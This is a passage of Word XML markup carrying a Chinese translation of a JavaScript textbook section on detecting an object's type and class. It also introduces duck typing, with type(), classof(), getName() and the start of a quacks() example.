      <w:r>
        <w:t>函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/**</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>以字符串形式返回</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的类型</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*-</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>null,</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>"null"</w:t>
      </w:r>
      <w:r>
        <w:t>；如果</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>NaN,</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>"nan"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*-</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>typeof</w:t>
      </w:r>
      <w:r>
        <w:t>所返回的值不是</w:t>
      </w:r>
      <w:r>
        <w:t>"object"</w:t>
      </w:r>
      <w:r>
        <w:t>，则返回这个值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*(</w:t>
      </w:r>
      <w:r>
        <w:t>注意，有一些</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的实现将正则表达式识别为函数</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*-</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的类不是</w:t>
      </w:r>
      <w:r>
        <w:t>"Object"</w:t>
      </w:r>
      <w:r>
        <w:t>，则返回这个值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*-</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>包含构造函数并且这个构造函数具有名称</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>则返回这个名称</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*-</w:t>
      </w:r>
      <w:r>
        <w:t>否则，一律返回</w:t>
      </w:r>
      <w:r>
        <w:t>"Object"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>**/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function type(o){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var t,c,n;//type,class,name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>处理</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>值的特殊情形</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(o===null)return"null";//</w:t>
      </w:r>
      <w:r>
        <w:t>另外一种特殊情形</w:t>
      </w:r>
      <w:r>
        <w:t>:NaN</w:t>
      </w:r>
      <w:r>
        <w:t>和它自身不相等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(o!==o)return"nan";//</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>typeof</w:t>
      </w:r>
      <w:r>
        <w:t>的值不是</w:t>
      </w:r>
      <w:r>
        <w:t>"object"</w:t>
      </w:r>
      <w:r>
        <w:t>，则使用这个值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这可以识别出原始值的类型和函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if((t=typeof o)!=="object")return t;//</w:t>
      </w:r>
      <w:r>
        <w:t>返回对象的类名，除非值为</w:t>
      </w:r>
      <w:r>
        <w:t>"Object"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这种方式可以识别出大多数的内置对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if((c=classof(o))!=="Object")return c;//</w:t>
      </w:r>
      <w:r>
        <w:t>如果对象构造函数的名字存在的话，则返回它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(o.constructor</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>typeof o.constructor==="function"</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>(n=o.constructor.getName()))return n;//</w:t>
      </w:r>
      <w:r>
        <w:t>其他的类型都无法判别，一律返回</w:t>
      </w:r>
      <w:r>
        <w:t>"Object"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return"Object";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>返回对象的类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function classof(o){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return Object.prototype.toString.call(o).slice(8,-1);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>返回函数的名字（可能是空字符串），不是函数的话返回</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Function.prototype.getName=function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if("name"in this)return this.name;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:t>this.name=this.toString().match(/function\s*([^(]*)\(/)[1];</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这种使用构造函数名字来识别对象的类的做法和使用</w:t>
      </w:r>
      <w:r>
        <w:t>constructor</w:t>
      </w:r>
      <w:r>
        <w:t>属性一样有一个问题：并不是所有的对象都具有</w:t>
      </w:r>
      <w:r>
        <w:t>constructor</w:t>
      </w:r>
      <w:r>
        <w:t>属性。此外，并不是所有的函数都有名字。如果使用不带名字的函数定义表达式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:r>
        <w:t>定义一个构造函数，</w:t>
      </w:r>
      <w:r>
        <w:t>getName()</w:t>
      </w:r>
      <w:r>
        <w:t>方法则会返回空字符串：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这个构造函数没有名字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var Complex=function(x,y){this.r=x;this.i=y;</w:t>
      </w:r>
      <w:r>
        <w:t>}//</w:t>
      </w:r>
      <w:r>
        <w:t>这个构造函数有名字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var Range=function Range(f,t){this.from=f;this.to=t;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="234" w:name="9_5_4_Ya_Shi_Bian_Xing_"/>
      <w:r>
        <w:t>9.5.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　鸭式辩型</w:t>
      </w:r>
      <w:bookmarkEnd w:id="234"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>上文所描述的检测对象的类的各种技术多少都会有些问题，至少在客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中是如此。解决办法就是规避掉这些问题：不要关注</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>对象的类是什么</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，而是关注</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>对象能做什么</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。这种思考问题的方式在</w:t>
      </w:r>
      <w:r>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Ruby</w:t>
      </w:r>
      <w:r>
        <w:t>中非常普遍，称为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>鸭式辩型</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（这个表述是由作家</w:t>
      </w:r>
      <w:r>
        <w:t>James Whitcomb Riley</w:t>
      </w:r>
      <w:r>
        <w:t>提出的）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>像鸭子一样走路、游泳并且嘎嘎叫的鸟就是鸭子。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对于</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序员来说，这句话可以理解为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>如果一个对象可以像鸭子一样走路、游泳并且嘎嘎叫，就认为这个对象是鸭子，哪怕它并不是从鸭子类的原型对象继承而来的</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>我们拿例</w:t>
      </w:r>
      <w:r>
        <w:t>9-2</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>类来举例好了。起初定义这个类用以描述数字的范围。但要注意，</w:t>
      </w:r>
      <w:r>
        <w:t>Range()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数并没有对实参进行类型检查以确保实参是数字类型。但却将参数使用</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符进行比较运算，因为这里假定它们是可比较的。同样，</w:t>
      </w:r>
      <w:r>
        <w:t>includes()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符进行比较，但没有对范围的结</w:t>
      </w:r>
      <w:r>
        <w:t>束点进行类似的假设。因为类并没有强制使用特定的类型，它的</w:t>
      </w:r>
      <w:r>
        <w:t>inlcudes()</w:t>
      </w:r>
      <w:r>
        <w:t>方法可以作用于任何结束点，只要结束点可以用关系运算符执行比较运算。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var lowercase=new Range("a","z");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var thisYear=new Range(new Date(2009,0,1),new Date(2010,0,1));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>类的</w:t>
      </w:r>
      <w:r>
        <w:t>foreach()</w:t>
      </w:r>
      <w:r>
        <w:t>方法中也没有显式地检测表示范围的结束点的类型，但</w:t>
      </w:r>
      <w:r>
        <w:t>Math.ceil()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“++”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符表明它只能对数字结束点进行操作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>另外一个例子，回想</w:t>
      </w:r>
      <w:r>
        <w:t>一下在</w:t>
      </w:r>
      <w:r>
        <w:t>7.11</w:t>
      </w:r>
      <w:r>
        <w:t>节中所讨论的类数组对象。在很多场景下，我们并不知道一个对象是否真的是</w:t>
      </w:r>
      <w:r>
        <w:t>Array</w:t>
      </w:r>
      <w:r>
        <w:t>的实例，当然是可以通过判断是否包含非负的</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性来得知是否是</w:t>
      </w:r>
      <w:r>
        <w:t>Array</w:t>
      </w:r>
      <w:r>
        <w:t>的实例。我们说</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>包含一个值是非负整数的</w:t>
      </w:r>
      <w:r>
        <w:t>length”</w:t>
      </w:r>
      <w:r>
        <w:t>是数组的一个特征</w:t>
      </w:r>
      <w:r>
        <w:t>——“</w:t>
      </w:r>
      <w:r>
        <w:t>会走路</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，任何具有</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>会走路</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>这个特征的对象都可以当做数组来对待（在很多情形中）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>然而必须要了解的是，真正数组的</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性有一些独有的行为：当添加新的元素时，数组的长度会自动更新，并且当给</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性设置一个更小的整数时，数组会被自动截断。我们说这些特征</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>会游泳</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>嘎嘎叫</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。如果所实现的代码需要</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>会游泳</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>且能</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>嘎嘎叫</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，则不能使用只</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>会走路</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的类似数组的对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>上文所讲到的鸭式辩型的例子提到了进行对象的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符的职责以及</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性的特殊行为。但当我们提到鸭式辩型时，往往是说检测对象是否实现了一个或多个方法。一个强类型的</w:t>
      </w:r>
      <w:r>
        <w:t>triathlon()</w:t>
      </w:r>
      <w:r>
        <w:t>函数所需要的参数必须是</w:t>
      </w:r>
      <w:r>
        <w:t>TriAthlete</w:t>
      </w:r>
      <w:r>
        <w:t>对象。而一种</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>鸭式辩型</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>式的做法是，只要对象包含</w:t>
      </w:r>
      <w:r>
        <w:t>walk()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>swim()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>bike()</w:t>
      </w:r>
      <w:r>
        <w:t>这三个方法就可以作为参数传入。同理，可以重新设计</w:t>
      </w:r>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>类，使用结束点对象的</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>ompareTo()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>succ()</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>successor</w:t>
      </w:r>
      <w:r>
        <w:t>）方法来代替</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“++”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>鸭式辩型的实现方法让人感觉太</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>放任自流</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>：仅仅是假设输入对象实现了必要的方法，根本没有执行进一步的检查。如果输入对象没有遵循</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>假设</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，那么当代码试图调用那些不存在的方法时就会报错。另一种实现方法是对输入对象进行检查。但不是检查它们的类，而是用适当的名字来检查它们所实现的方法。这样可以将非法输入尽可能早地拦截在外，并可给出带有更多提示信息的报错。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>9-5</w:t>
      </w:r>
      <w:r>
        <w:t>中按照鸭式辩型的理念定义了</w:t>
      </w:r>
      <w:r>
        <w:t>quacks()</w:t>
      </w:r>
      <w:r>
        <w:t>函数（函数名叫</w:t>
      </w:r>
      <w:r>
        <w:t>"imp</w:t>
      </w:r>
      <w:r>
        <w:t>lements"</w:t>
      </w:r>
      <w:r>
        <w:t>会更加合适，但</w:t>
      </w:r>
      <w:r>
        <w:t>implements</w:t>
      </w:r>
      <w:r>
        <w:t>是保留字）。</w:t>
      </w:r>
      <w:r>
        <w:t>quacks()</w:t>
      </w:r>
      <w:r>
        <w:t>用以检查一个对象（第一个实参）是否实现了剩下的参数所表示的方</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>法。对于除第一个参数外的每个参数，如果是字符串的话则直接检查是否存在以它命名的方法；如果是对象的话则检查第一个对象中的方法是否在这个对象中也具有同名的方法；如果参数是函数，则假定它是构造函数，函数将检查第一个对象实现的方法是否在构造函数的原型对象中也具有同名的方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>9-5</w:t>
      </w:r>
      <w:r>
        <w:t>：利用鸭式辩型实现的函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>实现了除第一个参数之外的参数所表示的方法，则返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>unction quacks(o/*,...*/){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=1;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>arguments.length;i++){//</w:t>
      </w:r>
      <w:r>
        <w:t>遍历</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>之后的所有参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var arg=arguments[i];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
